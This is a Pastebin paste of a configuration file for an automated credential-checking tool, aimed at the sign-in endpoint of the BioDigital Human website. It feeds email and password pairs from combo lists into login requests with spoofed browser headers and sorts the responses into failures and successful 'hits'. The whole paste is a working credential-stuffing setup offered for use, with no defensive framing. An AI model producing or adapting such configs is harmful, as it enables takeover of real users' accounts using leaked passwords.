Advertisement
Guest User

BioD

a guest
Sep 20th, 2018
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. [General]
  2. UseProxy = False
  3. UseGlobalKeywords = False
  4. DefaultTimeout = 10
  5. UnbanAllProxiesWhenAllBannedAfter = 0.1
  6. HitsFolderName = Biodigital (Mave Edited by MR.ViPeR)
  7.  
  8. [Stage-1]
  9. Condition = Any
  10. Variable-1 = $Link1 = "https://human.biodigital.com/ws/user/sign/in"
  11. Link = $Link1#
  12. isFTP = False
  13. HTTPVersion = 1.1
  14. FollowRedirect = False
  15. HTTPRequestMethod = POST
  16. Timeout = 10
  17. Variable-2 = $Heads1 = ":authority: human.biodigital.com\n:method:POST\n:path: /ws/user/sign/in\n:scheme: https\naccept: application/json, text/plain, */*\naccept-encoding: gzip, deflate, br\naccept-language: en-US,en;q=0.9\ncache-control: no-cache\ncontent-length: 72\ncontent-type: application/x-www-form-urlencoded; charset=UTF-8\ncookie: _ga=GA1.2.669795338.1537376897;_gid=GA1.2.1065576175.1537376897\norigin: https://human.biodigital.com\npragma: no-cache\nreferer: https://human.biodigital.com/signin.html?signout=1\nuser-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
  18. Headers = $Heads1#
  19. Variable-3 = $PostContent1 = combinetext("email=",$combousername#,"&password=",$combopassword#,"&email_remember_me=false")
  20. PostContent = $PostContent1#
  21. Variable-4 = $FailKey1 = "401"
  22. Variable-5 = $IndexOfFailKey1 = indexof($stage1responseheader#, $FailKey1#)
  23. Failure-Condition = $IndexOfFailedKey1# >= 0
  24. Variable-6 = $IndexOfSuccessKey1 = indexof($stage1responsesource#, "Sign Out")
  25. Success-Condition = $IndexOfSuccessKey1# >= 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement